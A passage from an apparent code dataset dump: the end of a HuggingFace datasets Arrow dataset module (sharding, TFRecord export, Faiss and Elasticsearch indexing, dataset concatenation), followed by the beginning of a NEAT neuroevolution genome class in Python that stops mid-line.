new_fingerprint=test_new_fingerprint,\n )\n\n return DatasetDict({\"train\": train_split, \"test\": test_split})\n\n def shard(\n self,\n num_shards: int,\n index: int,\n contiguous: bool = False,\n keep_in_memory: bool = False,\n indices_cache_file_name: Optional[str] = None,\n writer_batch_size: Optional[int] = 1000,\n ) -> \"Dataset\":\n \"\"\"Return the `index`-nth shard from dataset split into `num_shards` pieces.\n\n This shards deterministically. dset.shard(n, i) will contain all elements of dset whose\n index mod n = i.\n\n dset.shard(n, i, contiguous=True) will instead split dset into contiguous chunks,\n so it can be easily concatenated back together after processing. 
In general, if `len(dset) % n == l`, then the\n        first `l` shards will have length `(len(dset) // n) + 1`, and the remaining shards will have length `(len(dset) // n)`.\n        `datasets.concatenate_datasets([dset.shard(n, i, contiguous=True) for i in range(n)])` will return\n        a dataset with the same order as the original.\n\n        Be sure to shard before using any randomizing operator (such as shuffle).\n        It is best if the shard operator is used early in the dataset pipeline.\n\n        Args:\n            num_shards (`int`): How many shards to split the dataset into.\n            index (`int`): Which shard to select and return.\n            contiguous (`bool`, defaults to `False`): Whether to select contiguous blocks of indices for shards.\n            keep_in_memory (`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file.\n            indices_cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a cache file to use to store the\n                indices of each shard instead of the automatically generated cache file name.\n            writer_batch_size (`int`, defaults to `1000`): Number of rows per write operation for the cache file writer.\n                Higher value gives smaller cache files, lower value consume less temporary memory while running `.map()`.\n        \"\"\"\n        assert 0 <= index < num_shards, \"index should be in [0, num_shards-1]\"\n        if contiguous:\n            div = len(self) // num_shards\n            mod = len(self) % num_shards\n            start = div * index + min(index, mod)\n            end = start + div + (1 if index < mod else 0)\n            indices = np.arange(start, end)\n        else:\n            indices = np.arange(index, len(self), num_shards)\n\n        return self.select(\n            indices=indices,\n            keep_in_memory=keep_in_memory,\n            indices_cache_file_name=indices_cache_file_name,\n            writer_batch_size=writer_batch_size,\n        )\n\n    def export(\n        self,\n        filename: str,\n        format: str = \"tfrecord\",\n    ):\n        \"\"\"Writes the Arrow dataset to a TFRecord file.\n\n        The dataset must already be formatted as numpy (e.g. via `dataset.set_format(\"numpy\")`). The records will be written with\n        keys from `dataset._format_columns`.\n\n        Args:\n            `filename` (`str`): The filename, including the .tfrecord extension, to write to.\n            `format` (`Optional[str]`, default: `\"tfrecord\"`): The type of output file. Currently this is a no-op, as\n                TFRecords are the only option. 
This enables a more flexible function signature\n                later.\n        \"\"\"\n        try:\n            import tensorflow as tf  # noqa: F401\n        except ImportError:\n            raise ImportError(\"Tensorflow needs to be installed to be able to export the dataset to TFRecord.\")\n\n        # From https://www.tensorflow.org/tutorials/load_data/tfrecord\n        def _bytes_feature(values):\n            \"\"\"Returns a bytes_list from a list of string / byte.\"\"\"\n            return tf.train.Feature(bytes_list=tf.train.BytesList(value=values))\n\n        def _float_feature(values):\n            \"\"\"Returns a float_list from a list of float / double.\"\"\"\n            return tf.train.Feature(float_list=tf.train.FloatList(value=values))\n\n        def _int64_feature(values):\n            \"\"\"Returns an int64_list from a list of bool / enum / int / uint.\"\"\"\n            return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n        def _feature(values: np.ndarray) -> \"tf.train.Feature\":\n            \"\"\"Typechecks `values` and returns the corresponding tf.train.Feature.\"\"\"\n            if values.ndim == 0:\n                values = values.item()\n            if isinstance(values, np.ndarray):\n                if values.dtype == np.dtype(float):\n                    return _float_feature(values)\n                elif values.dtype == np.dtype(int):\n                    return _int64_feature(values)\n                elif values.dtype == np.dtype(str) or (\n                    values.dtype == np.dtype(object) and len(values) > 0 and isinstance(values[0], str)\n                ):\n                    return _bytes_feature([v.encode() for v in values])\n                else:\n                    raise ValueError(\n                        f\"values={values} is an np.ndarray with items of dtype {values.dtype}, which cannot be serialized\"\n                    )\n            elif isinstance(values, float):\n                return _float_feature([values])\n            elif isinstance(values, int):\n                return _int64_feature([values])\n            elif isinstance(values, str):\n                return _bytes_feature([values.encode()])\n            else:\n                raise ValueError(f\"values={values} of type {type(values)} cannot be serialized\")\n\n        def serialize_example(ex):\n            feature = {key: _feature(value) for key, value in ex.items()}\n            example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n            return example_proto.SerializeToString()\n\n        def tf_serialize_example(ex):\n            tf_string = tf.py_function(serialize_example, (ex,), tf.string)\n            return tf.reshape(tf_string, ())\n\n        def generator():\n            for ex in self:\n                yield serialize_example(ex)\n\n        assert self._format_type == \"numpy\", \"Dataset format must be numpy before exporting\"\n        assert filename.endswith(\".tfrecord\")\n        tf_dataset = tf.data.Dataset.from_generator(generator, output_types=tf.string, output_shapes=())\n        writer = tf.data.experimental.TFRecordWriter(filename)\n        logger.info(f\"Writing TFRecord to {filename}\")\n        writer.write(tf_dataset)\n        logger.info(f\"Finished writing TFRecord to {filename}\")\n\n    def add_faiss_index(\n        self,\n        column: str,\n        index_name: Optional[str] = None,\n        device: Optional[int] = None,\n        string_factory: Optional[str] = None,\n        metric_type: Optional[int] = None,\n        custom_index: Optional[\"faiss.Index\"] = None,  # noqa: F821\n        train_size: Optional[int] = None,\n        faiss_verbose: bool = False,\n        dtype=np.float32,\n    ):\n        \"\"\"Add a dense index using Faiss for fast retrieval.\n        By default the index is done over the vectors of the specified column.\n        You can specify :obj:`device` if you want to run it on GPU (:obj:`device` must be the GPU index).\n        You can find more information about Faiss here:\n\n        - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__\n\n        Args:\n            column (:obj:`str`):\n                The column of the vectors to add to the index.\n            index_name (Optional :obj:`str`):\n                The index_name/identifier of the index.\n                This is the index_name that is used to call 
:func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`.\n By default it corresponds to `column`.\n device (Optional :obj:`int`):\n If not None, this is the index of the GPU to use.\n By default it uses the CPU.\n string_factory (Optional :obj:`str`):\n This is passed to the index factory of Faiss to create the index.\n Default index class is ``IndexFlat``.\n metric_type (Optional :obj:`int`):\n Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2.\n custom_index (Optional :obj:`faiss.Index`):\n Custom Faiss index that you already have instantiated and configured for your needs.\n train_size (Optional :obj:`int`):\n If the index needs a training step, specifies how many vectors will be used to train the index.\n faiss_verbose (:obj:`bool`, defaults to False):\n Enable the verbosity of the Faiss index.\n dtype (data-type): The dtype of the numpy arrays that are indexed.\n Default is ``np.float32``.\n\n Example::\n\n ds = datasets.load_dataset('crime_and_punish', split='train')\n ds_with_embeddings = ds.map(lambda example: {'embeddings': embed(example['line'])})\n ds_with_embeddings.add_faiss_index(column='embeddings')\n # query\n scores, retrieved_examples = ds_with_embeddings.get_nearest_examples('embeddings', embed('my new query'), k=10)\n # save index\n ds_with_embeddings.save_faiss_index('embeddings', 'my_index.faiss')\n\n ds = datasets.load_dataset('crime_and_punish', split='train')\n # load index\n ds.load_faiss_index('embeddings', 'my_index.faiss')\n # query\n scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10)\n \"\"\"\n with self.formatted_as(type=\"numpy\", columns=[column], dtype=dtype):\n super().add_faiss_index(\n column=column,\n index_name=index_name,\n device=device,\n string_factory=string_factory,\n metric_type=metric_type,\n custom_index=custom_index,\n train_size=train_size,\n faiss_verbose=faiss_verbose,\n )\n return self\n\n def add_faiss_index_from_external_arrays(\n self,\n external_arrays: np.array,\n index_name: str,\n device: Optional[int] = None,\n string_factory: Optional[str] = None,\n metric_type: Optional[int] = None,\n custom_index: Optional[\"faiss.Index\"] = None, # noqa: F821\n train_size: Optional[int] = None,\n faiss_verbose: bool = False,\n dtype=np.float32,\n ):\n \"\"\"Add a dense index using Faiss for fast retrieval.\n The index is created using the vectors of `external_arrays`.\n You can specify `device` if you want to run it on GPU (`device` must be the GPU index).\n You can find more information about Faiss here:\n - For `string factory `__\n\n Args:\n external_arrays (:obj:`np.array`):\n If you want to use arrays from outside the lib for the index, you can set :obj:`external_arrays`.\n It will use :obj:`external_arrays` to create the Faiss index instead of the arrays in the given :obj:`column`.\n index_name (:obj:`str`):\n The index_name/identifier of the index.\n This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`.\n device (Optional :obj:`int`):\n If not None, this is the index of the GPU to use.\n By default it uses the CPU.\n string_factory (Optional :obj:`str`):\n This is passed to the index factory of Faiss to create the index.\n Default index class is ``IndexFlat``.\n metric_type (Optional :obj:`int`):\n Type of metric. 
Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2.\n custom_index (Optional :obj:`faiss.Index`):\n Custom Faiss index that you already have instantiated and configured for your needs.\n train_size (Optional :obj:`int`):\n If the index needs a training step, specifies how many vectors will be used to train the index.\n faiss_verbose (:obj:`bool`, defaults to False):\n Enable the verbosity of the Faiss index.\n dtype (:obj:`numpy.dtype`): The dtype of the numpy arrays that are indexed. Default is np.float32.\n \"\"\"\n super().add_faiss_index_from_external_arrays(\n external_arrays=external_arrays.astype(dtype),\n index_name=index_name,\n device=device,\n string_factory=string_factory,\n metric_type=metric_type,\n custom_index=custom_index,\n train_size=train_size,\n faiss_verbose=faiss_verbose,\n )\n\n def add_elasticsearch_index(\n self,\n column: str,\n index_name: Optional[str] = None,\n host: Optional[str] = None,\n port: Optional[int] = None,\n es_client: Optional[\"elasticsearch.Elasticsearch\"] = None, # noqa: F821\n es_index_name: Optional[str] = None,\n es_index_config: Optional[dict] = None,\n ):\n \"\"\"Add a text index using ElasticSearch for fast retrieval. This is done in-place.\n\n Args:\n column (:obj:`str`):\n The column of the documents to add to the index.\n index_name (Optional :obj:`str`):\n The index_name/identifier of the index.\n This is the index name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`.\n By default it corresponds to :obj:`column`.\n host (Optional :obj:`str`):\n The host of the elasticsearch cluster to connect to.\n port (Optional :obj:`int`):\n The port of the elasticsearch cluster to connect to.\n es_client (:obj:`elasticsearch.Elasticsearch`):\n The elasticsearch client used to create the index.\n es_index_name (Optional :obj:`str`):\n The elasticsearch index name used to create the index.\n es_index_config (Optional :obj:`dict`):\n The configuration of the elasticsearch index.\n Default config is:\n\n Config::\n\n {\n \"settings\": {\n \"number_of_shards\": 1,\n \"analysis\": {\"analyzer\": {\"stop_standard\": {\"type\": \"standard\", \"stopwords\": \"_english_\"}}},\n },\n \"mappings\": {\n \"properties\": {\n \"text\": {\n \"type\": \"text\",\n \"analyzer\": \"standard\",\n \"similarity\": \"BM25\"\n },\n }\n },\n }\n\n Example::\n\n es_client = elasticsearch.Elasticsearch()\n ds = datasets.load_dataset('crime_and_punish', split='train')\n ds.add_elasticsearch_index(column='line', es_client=es_client, es_index_name=\"my_es_index\")\n scores, retrieved_examples = ds.get_nearest_examples('line', 'my new query', k=10)\n\n \"\"\"\n with self.formatted_as(type=None, columns=[column]):\n super().add_elasticsearch_index(\n column=column, index_name=index_name, host=host, port=port, es_client=es_client,\n es_index_name=es_index_name, es_index_config=es_index_config\n )\n return self\n\n\ndef concatenate_datasets(\n dsets: List[Dataset],\n info: Optional[Any] = None,\n split: Optional[Any] = None,\n):\n \"\"\"\n Converts a list of :obj:``datasets.Dataset`` with the same schema into a single :obj:``datasets.Dataset``.\n\n Args:\n dsets (:obj:``List[datasets.Dataset]``): A list of Datasets to concatenate\n info (:obj:``datasets.DatasetInfo``, `optional`, defaults to :obj:``None``): If specified, the dataset info containing info like\n description, citation, etc.\n split (:obj:``datasets.NamedSplit``, `optional`, defaults to :obj:``None``): If specified, the name of the dataset split.\n \"\"\"\n if not all([dset.features.type == dsets[0].features.type for dset in dsets]):\n raise ValueError(\"Features must 
match for all datasets\")\n\n # Datasets tables should all come from disk or memory, but not a mix\n\n dsets_in_memory = [not dset._data_files for dset in dsets]\n if any(dset_in_memory != dsets_in_memory[0] for dset_in_memory in dsets_in_memory):\n raise ValueError(\n \"Datasets should ALL come from memory, or should ALL come from disk.\\n\"\n \"However datasets {} come from memory and datasets {} come from disk.\".format(\n [i for i in range(len(dsets)) if dsets_in_memory[i]],\n [i for i in range(len(dsets)) if not dsets_in_memory[i]],\n )\n )\n\n # Find common format or reset format\n\n format = dsets[0].format\n if any(dset.format != format for dset in dsets):\n format = {}\n logger.info(\"Some of the datasets have disparate format. Resetting the format of the concatenated dataset.\")\n\n # Concatenate tables\n\n table = pa.concat_tables(dset._data for dset in dsets if len(dset._data) > 0)\n data_files = [f for dset in dsets for f in dset._data_files]\n inplace_history = [h for dset in dsets for h in dset._inplace_history]\n\n def apply_offset_to_indices_table(table, offset):\n if offset == 0:\n return table\n else:\n array = table[\"indices\"]\n if isinstance(array, pa.ChunkedArray):\n new_array = pa.array(np.concatenate([c.to_numpy() for c in array.chunks]) + offset, pa.uint64())\n else:\n new_array = pa.array(array.to_numpy() + offset, pa.uint64())\n return pa.Table.from_arrays([new_array], names=[\"indices\"])\n\n # Concatenate indices if they exist\n\n if any(dset._indices is not None for dset in dsets):\n\n # Datasets indices tables should all come from disk or memory, but not a mix\n # Datasets with no indices tables are replaced with a dataset with an indices table in memory\n\n indices_mappings_in_memory = [not dset._indices_data_files for dset in dsets]\n if any(\n indices_mapping_in_memory != indices_mappings_in_memory[0]\n for indices_mapping_in_memory in indices_mappings_in_memory\n ):\n raise ValueError(\n \"Datasets' indices should ALL come from memory, or should ALL come from disk.\\n\"\n \"However datasets' indices {} come from memory and datasets' indices {} come from disk.\".format(\n [i for i in range(len(dsets)) if indices_mappings_in_memory[i]],\n [i for i in range(len(dsets)) if not indices_mappings_in_memory[i]],\n )\n )\n indices_in_memory = indices_mappings_in_memory[0]\n\n # Create missing indices tables in memory\n\n if indices_in_memory:\n for i in range(len(dsets)):\n if dsets[i]._indices is None:\n dsets[i] = dsets[i].select(range(len(dsets[i])))\n assert all(dset._indices is not None for dset in dsets), \"each dataset should have an indices table\"\n\n # An offset needs to be applied to the indices before concatenating\n\n indices_tables = []\n offset = 0\n for dset in dsets:\n indices_tables.append(apply_offset_to_indices_table(dset._indices, offset))\n offset += len(dset._data)\n\n # Concatenate indices\n\n indices_tables = [t for t in indices_tables if len(t) > 0]\n if indices_tables:\n indices_table = pa.concat_tables(indices_tables)\n else:\n indices_table = pa.Table.from_batches([], schema=pa.schema({\"indices\": pa.int64()}))\n indices_data_files = None # can't reuse same files as an offset was applied\n else:\n indices_table = None\n indices_data_files = None\n if info is None:\n info = DatasetInfo.from_merge([dset.info for dset in dsets])\n fingerprint = update_fingerprint(\n \"\".join(dset._fingerprint for dset in dsets), concatenate_datasets, {\"info\": info, \"split\": split}\n )\n 
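# Assemble the concatenated dataset, carrying over tables, cache files, and in-place history.\n 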
concatenated_dataset = Dataset(\n table,\n info=info,\n split=split,\n data_files=data_files,\n indices_table=indices_table,\n indices_data_files=indices_data_files,\n fingerprint=fingerprint,\n inplace_history=inplace_history,\n )\n concatenated_dataset.set_format(**format)\n return concatenated_dataset\n\n\n# This is outside Dataset.filter as it needs to be picklable for multiprocessing\n\n# transform the filter function into the map function\ndef map_function(batch, *args, function=None, with_indices=None, **fn_kwargs):\n assert function is not None and with_indices is not None\n result = defaultdict(list)\n num_examples = len(batch[next(iter(batch.keys()))])\n input_columns = fn_kwargs.pop(\"input_columns\", None)\n\n # create single examples\n for i in range(num_examples):\n example = map_nested(lambda x: x[i], batch, dict_only=True)\n fn_args = [example] if input_columns is None else [example[col] for col in input_columns]\n\n # check if example should be filtered or not\n if with_indices:\n keep_example = function(*fn_args, args[0][i], **fn_kwargs)\n else:\n keep_example = function(*fn_args, **fn_kwargs)\n\n assert isinstance(\n keep_example, bool\n ), f\"The filter function returns a variable of type {type(keep_example)}, but should return a variable of type `bool`.\"\n # if example shall be kept add to result\n if keep_example:\n for key in batch.keys():\n result[key].append(example[key])\n\n # if no example shall be kept, init with empty lists\n if not result:\n for key in batch.keys():\n result[key] = []\n\n return result\n","repo_name":"MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020","sub_path":"venv/lib/python3.6/site-packages/datasets/arrow_dataset.py","file_name":"arrow_dataset.py","file_ext":"py","file_size_in_byte":125607,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
+{"seq_id":"27417817750","text":"\"\"\"Implementation based on NEAT-Python neat-python/neat/genome.py:\nhttps://github.com/CodeReclaimers/neat-python/blob/master/neat/genome.py\"\"\"\n\nimport random\nimport sys\nfrom itertools import count\n\nimport neuroevolution.activation_functions as activation_functions\nimport neuroevolution.aggregations as aggregations\nimport neuroevolution.genes as genes\nimport neuroevolution.graphs as graphs\nfrom neuroevolution.config import ConfigParameter, write_pretty_params\n\n\n\n\nclass DefaultGenomeConfig:\n allowed_connectivity = [\"unconnected\", \"fs_neat_nohidden\", \"fs_neat\", \"fs_neat_hidden\", \"full_nodirect\",\n \"full\", \"full_direct\", \"partial_nodirect\", \"partial\", \"partial_direct\"]\n\n def __init__(self, params):\n self.activation_defs = activation_functions.str_to_activation\n self.aggregation_defs = aggregations.str_to_aggregation\n self._params = [ConfigParameter(\"n_in\", int),\n ConfigParameter(\"n_out\", int),\n ConfigParameter(\"n_hid\", int),\n ConfigParameter(\"feed_forward\", bool),\n ConfigParameter(\"compatibility_disjoint_coefficient\", float),\n ConfigParameter(\"compatibility_weight_coefficient\", float),\n ConfigParameter(\"conn_add_prob\", float),\n ConfigParameter(\"conn_delete_prob\", float),\n ConfigParameter(\"node_add_prob\", float),\n ConfigParameter(\"node_delete_prob\", float),\n ConfigParameter(\"single_structural_mutation\", bool, \"false\"),\n ConfigParameter(\"structural_mutation_surer\", str, \"default\"),\n ConfigParameter(\"initial_connection\", str, \"unconnected\")]\n\n self.node_gene_type = params[\"node_gene_type\"]\n self._params += self.node_gene_type.get_config_params()\n 
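# The connection gene type contributes its own config parameters in the same way.\n 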
self.connection_gene_type = params[\"connection_gene_type\"]\n self._params += self.connection_gene_type.get_config_params()\n\n for p in self._params:\n setattr(self, p.name, p.interpret(params))\n\n # NEAT convention: input nodes use negative keys; output nodes are numbered 0..n_out-1\n self.input_keys = [-i - 1 for i in range(self.n_in)]\n self.output_keys = [i for i in range(self.n_out)]\n\n self.connection_fraction = None\n\n if \"partial\" in self.initial_connection:\n c, p = self.initial_connection.split()\n self.initial_connection = c\n self.connection_fraction = float(p)\n if not (0 <= self.connection_fraction <= 1):\n raise RuntimeError(\"'partial' connection must be between [0.0, 1.0]\")\n\n assert self.initial_connection in self.allowed_connectivity\n\n if self.structural_mutation_surer.lower() in [\"true\", \"1\", \"yes\", \"on\"]:\n self.structural_mutation_surer = \"true\"\n elif self.structural_mutation_surer.lower() in [\"false\", \"0\", \"no\", \"off\"]:\n self.structural_mutation_surer = \"false\"\n elif self.structural_mutation_surer.lower() == \"default\":\n self.structural_mutation_surer = \"default\"\n else:\n raise RuntimeError(\"Invalid structural_mutation_surer %r\" % self.structural_mutation_surer)\n\n self.node_indexer = None\n\n def add_activation(self, name, func):\n self.activation_defs[name] = func\n\n def add_aggregation(self, name, func):\n self.aggregation_defs[name] = func\n\n def save(self, f):\n if 'partial' in self.initial_connection:\n if not (0 <= self.connection_fraction <= 1):\n raise RuntimeError(\"'partial' connection value must be between [0.0, 1.0]\")\n f.write(\"initial_connection = {0} {1} \\n\".format(self.initial_connection, self.connection_fraction))\n else:\n f.write(\"initial_connection = {0} \\n\".format(self.initial_connection))\n\n assert self.initial_connection in self.allowed_connectivity\n write_pretty_params(f, self, [p for p in self._params if \"initial_connection\" not in p.name])\n\n def get_new_node_key(self, node_dict):\n if self.node_indexer is None:\n self.node_indexer = count(max(list(node_dict.keys())) + 1)\n new_id = next(self.node_indexer)\n assert new_id not in node_dict\n return new_id\n\n def check_structural_mutation_surer(self):\n if self.structural_mutation_surer == \"true\":\n return True\n elif self.structural_mutation_surer == \"false\":\n return False\n elif self.structural_mutation_surer == \"default\":\n return self.single_structural_mutation\n else:\n raise RuntimeError(\"Invalid structural_mutation_surer {!r}\".format(self.structural_mutation_surer))\n\n\n\n\nclass DefaultGenome:\n def __init__(self, key):\n self.key = key\n self.connections = {}\n self.nodes = {}\n self.fitness = None\n\n def __str__(self):\n string = \"Key: {0}\\nFitness: {1}\\nNodes:\".format(self.key, self.fitness)\n for k, ng in self.nodes.items():\n string += \"\\n\\t{0} {1!s}\".format(k, ng)\n string += \"\\nConnections:\"\n connections = list(self.connections.values())\n connections.sort()\n for c in connections:\n string += \"\\n\\t\" + str(c)\n return string\n\n @classmethod\n def parse_config(cls, param_dict):\n param_dict['node_gene_type'] = genes.DefaultNodeGene\n param_dict['connection_gene_type'] = genes.DefaultConnectionGene\n return DefaultGenomeConfig(param_dict)\n\n @classmethod\n def write_config(cls, f, config):\n config.save(f)\n\n def configure_new(self, config):\n for node_key in config.output_keys:\n self.nodes[node_key] = self.create_node(config, node_key)\n\n if config.n_hid > 0:\n for i in range(config.n_hid):\n node_key = config.get_new_node_key(self.nodes)\n assert node_key not in self.nodes\n 
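# hidden nodes receive fresh keys above the current maximum node key\n 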
node = self.create_node(config, node_key)\n self.nodes[node_key] = node\n\n if \"fs_neat\" in config.initial_connection:\n if config.initial_connection == \"fs_neat_nohidden\":\n self.connect_fs_neat_nohidden(config)\n elif config.initial_connection == \"fs_neat_hidden\":\n self.connect_fs_neat_hidden(config)\n else:\n if config.n_hid > 0:\n print(\"Warning: initial_connection = fs_neat will not connect to hidden nodes;\",\n \"\\tif this is desired, set initial_connection = fs_neat_nohidden;\",\n \"\\tif not, set initial_connection = fs_neat_hidden\", sep=\"\\n\", file=sys.stderr)\n self.connect_fs_neat_nohidden(config)\n\n elif \"full\" in config.initial_connection:\n if config.initial_connection == \"full_nodirect\":\n self.connect_full_nodirect(config)\n elif config.initial_connection == \"full_direct\":\n self.connect_full_direct(config)\n else:\n if config.n_hid > 0:\n print(\"Warning: initial_connection = full with hidden nodes will not do direct input-output connections;\",\n \"\\tif this is desired, set initial_connection = full_nodirect;\",\n \"\\tif not, set initial_connection = full_direct\", sep='\\n', file=sys.stderr)\n self.connect_full_nodirect(config)\n\n elif \"partial\" in config.initial_connection:\n if config.initial_connection == \"partial_nodirect\":\n self.connect_partial_nodirect(config)\n elif config.initial_connection == \"partial_direct\":\n self.connect_partial_direct(config)\n else:\n if config.n_hid > 0:\n print(\"Warning: initial_connection = partial with hidden nodes will not do direct input-output connections;\",\n \"\\tif this is desired, set initial_connection = partial_nodirect {0};\".format(\n config.connection_fraction),\n \"\\tif not, set initial_connection = partial_direct {0}\".format(\n config.connection_fraction),\n sep='\\n', file=sys.stderr)\n self.connect_partial_nodirect(config)\n\n def configure_crossover(self, genome1, genome2, config):\n assert isinstance(genome1.fitness, (int, float))\n assert isinstance(genome2.fitness, (int, float))\n if genome1.fitness > genome2.fitness:\n parent1, parent2 = genome1, genome2\n else:\n parent1, parent2 = genome2, genome1\n\n for key, cg1 in parent1.connections.items():\n cg2 = parent2.connections.get(key) # '.get(key)' instead of '[key]' to return None if '[key]' doesn't exist\n if cg2 is None: # excess or disjoint gene, copy from fittest parent\n self.connections[key] = cg1.copy()\n else: # homologous gene, combine parents' genes\n self.connections[key] = cg1.crossover(cg2)\n\n parent1_set = parent1.nodes\n parent2_set = parent2.nodes\n\n for key, ng1 in parent1_set.items():\n ng2 = parent2_set.get(key)\n assert key not in self.nodes\n if ng2 is None: # extra gene, copy from fittest parent\n self.nodes[key] = ng1.copy()\n else: # homologous gene, combine parents' genes\n self.nodes[key] = ng1.crossover(ng2)\n\n def mutate(self, config):\n if config.single_structural_mutation:\n div = max(1, (config.node_add_prob + config.node_delete_prob +\n config.conn_add_prob + config.conn_delete_prob))\n r = random.random()\n if r < (config.node_add_prob / div):\n self.mutate_add_node(config)\n elif r < ((config.node_add_prob + config.node_delete_prob) / div):\n self.mutate_delete_node(config)\n elif r < ((config.node_add_prob + config.node_delete_prob + config.conn_add_prob) / div):\n self.mutate_add_connection(config)\n elif r < ((config.node_add_prob + config.node_delete_prob +\n config.conn_add_prob + config.conn_delete_prob) / div):\n self.mutate_delete_connection(config)\n else:\n # in non-single mode, each structural mutation type is rolled independently\n if random.random() < config.node_add_prob:\n 
self.mutate_add_node(config)\n if random.random() < config.node_delete_prob:\n self.mutate_delete_node(config)\n if random.random() < config.conn_add_prob:\n self.mutate_add_connection(config)\n if random.random() < config.conn_delete_prob:\n self.mutate_delete_connection(config)\n\n for cg in self.connections.values(): # mutate connection genes\n cg.mutate(config)\n\n for ng in self.nodes.values(): # mutate node genes\n ng.mutate(config)\n\n def mutate_add_node(self, config):\n if not self.connections:\n if config.check_structural_mutation_surer():\n self.mutate_add_connection(config)\n return\n\n conn2split = random.choice(list(self.connections.values()))\n new_n_key = config.get_new_node_key(self.nodes)\n ng = self.create_node(config, new_n_key)\n self.nodes[new_n_key] = ng\n\n conn2split.enabled = False\n in_n, out_n = conn2split.key\n # connect in_n to the new node with weight 1.0, and the new node to out_n with the old weight between in_n and out_n\n self.add_connection(config, in_n, new_n_key, 1.0, True)\n self.add_connection(config, new_n_key, out_n, conn2split.weight, True)\n\n def add_connection(self, config, in_key, out_key, weight, enabled):\n assert isinstance(in_key, int)\n assert isinstance(out_key, int)\n assert out_key >= 0\n assert isinstance(enabled, bool)\n\n key = (in_key, out_key)\n connection = config.connection_gene_type(key)\n connection.init_attributes(config)\n connection.weight = weight\n connection.enabled = enabled\n self.connections[key] = connection\n\n def mutate_delete_node(self, config):\n available_nodes = [k for k in self.nodes.keys() if k not in config.output_keys]\n if not available_nodes:\n return -1\n del_key = random.choice(available_nodes)\n conn2del = set()\n for key, value in self.connections.items():\n if del_key in value.key:\n conn2del.add(value.key)\n for key in conn2del:\n del self.connections[key]\n del self.nodes[del_key]\n return del_key\n\n def mutate_add_connection(self, config):\n possible_outputs = list(self.nodes.keys())\n out_node = random.choice(possible_outputs)\n possible_inputs = possible_outputs + config.input_keys\n in_node = random.choice(possible_inputs)\n\n key = (in_node, out_node)\n # avoids duplicating connections\n if key in self.connections:\n if config.check_structural_mutation_surer():\n self.connections[key].enabled = True\n return\n # avoids connecting two output nodes\n if in_node in config.output_keys and out_node in config.output_keys:\n return\n # avoids creating cycles for feed forward networks\n if config.feed_forward and graphs.creates_cycle(list(self.connections.keys()), key):\n return\n\n cg = self.create_connection(config, in_node, out_node)\n self.connections[cg.key] = cg\n\n def mutate_delete_connection(self, config):\n if self.connections:\n key = random.choice(list(self.connections.keys()))\n del self.connections[key]\n\n def distance(self, other, config):\n node_distance = 0.0\n if self.nodes or other.nodes:\n disjoint_nodes = 0\n for k2 in other.nodes.keys():\n if k2 not in self.nodes:\n disjoint_nodes += 1\n for k1, n1 in self.nodes.items():\n n2 = other.nodes.get(k1)\n if n2 is None:\n disjoint_nodes += 1\n else:\n node_distance += n1.distance(n2, config)\n\n max_nodes = max(len(self.nodes), len(other.nodes))\n node_distance = (node_distance + (config.compatibility_disjoint_coefficient * disjoint_nodes)) / max_nodes\n\n connection_distance = 0.0\n if self.connections or other.connections:\n disjoint_connections = 0\n for k2 in other.connections.keys():\n if k2 not in self.connections.keys():\n 
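# a connection present only in the other genome counts as disjoint/excess\n 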
disjoint_connections += 1\n for k1, c1 in self.connections.items():\n c2 = other.connections.get(k1)\n if c2 is None:\n disjoint_connections += 1\n else:\n connection_distance += c1.distance(c2, config)\n\n max_connections = max(len(self.connections), len(other.connections))\n connection_distance = (connection_distance +\n (config.compatibility_disjoint_coefficient *\n disjoint_connections)) /max_connections\n\n distance = node_distance + connection_distance\n return distance\n\n def size(self):\n n_enabled_conn = sum([1 for cg in self.connections.values() if cg.enabled])\n return len(self.nodes), n_enabled_conn\n\n @staticmethod\n def create_node(config, node_key):\n node = config.node_gene_type(node_key)\n node.init_attributes(config)\n return node\n\n @staticmethod\n def create_connection(config, in_key, out_key):\n connection = config.connection_gene_type((in_key, out_key))\n connection.init_attributes(config)\n return connection\n\n def connect_fs_neat_nohidden(self, config):\n in_key = random.choice(config.input_keys)\n for out_key in config.output_keys:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_fs_neat_hidden(self, config):\n in_key = random.choice(config.input_keys)\n others = [i for i in self.nodes.keys() if i not in config.input_keys]\n for out_key in others:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def compute_full_connections(self, config, direct):\n hidden = [i for i in self.nodes.keys() if i not in config.output_keys]\n output = [i for i in self.nodes.keys() if i in config.output_keys]\n connections = []\n if direct or (not hidden): # direct connections\n for in_key in config.input_keys:\n for out_key in config.output_keys:\n connections.append((in_key, out_key))\n if hidden: # hidden connections\n for in_key in config.input_keys:\n for h in hidden:\n connections.append((in_key, h))\n for h in hidden:\n for out_key in config.output_keys:\n connections.append((h, out_key))\n if not config.feed_forward: # self-connections in RNNs\n for i in self.nodes.keys():\n connections.append((i, i))\n\n return connections\n\n def connect_full_nodirect(self, config):\n for in_key, out_key in self.compute_full_connections(config, False):\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_full_direct(self, config):\n for in_key, out_key in self.compute_full_connections(config, True):\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_partial_nodirect(self, config):\n assert 0 <= config.connection_fraction <= 1\n all_connections = self.compute_full_connections(config, False)\n random.shuffle(all_connections)\n n2add = int(round(len(all_connections) * config.connection_fraction))\n for in_key, out_key in all_connections[:n2add]:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_partial_direct(self, config):\n assert 0 <= config.connection_fraction <= 1\n all_connections = self.compute_full_connections(config, True)\n random.shuffle(all_connections)\n n2add = int(round(len(all_connections) * config.connection_fraction))\n for in_key, out_key in all_connections[:n2add]:\n connection = self.create_connection(config, 